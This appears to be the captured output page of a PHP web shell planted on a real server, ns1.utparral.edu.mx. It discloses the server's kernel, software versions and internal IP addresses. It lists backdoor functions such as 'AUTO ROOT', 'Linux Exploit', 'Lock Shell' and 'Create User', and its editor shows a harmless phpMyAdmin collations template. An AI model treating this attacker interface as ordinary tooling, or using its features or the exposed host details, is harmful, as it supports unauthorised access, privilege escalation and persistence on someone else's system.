Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
templates /
server /
collations /
[ HOME SHELL ]
Name
Size
Permission
Action
index.twig
1.04
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.twig
<div class=container-fluid> <h2> {{ get_image('s_asci') }} {% trans 'Character sets and collations' %} </h2> {% for charset in charsets %} <div class="card mb-3"> <div class="card-header"> <div><strong>{{ charset.name }}</strong></div> <div>{{ charset.description }}</div> </div> <ul class="list-group list-group-flush"> {% for collation in charset.collations %} <li class="list-group-item"> <div class="row"> <div class="col"> <div><strong>{{ collation.name }}</strong></div> <div>{{ collation.description }}</div> </div> <div class="col align-self-center text-end"> {% if collation.is_default %} <span class="badge bg-secondary text-dark">{% trans %}default{% context %}The collation is the default one{% endtrans %}</span> {% endif %} </div> </div> </li> {% endfor %} </ul> </div> {% endfor %} </div>
Close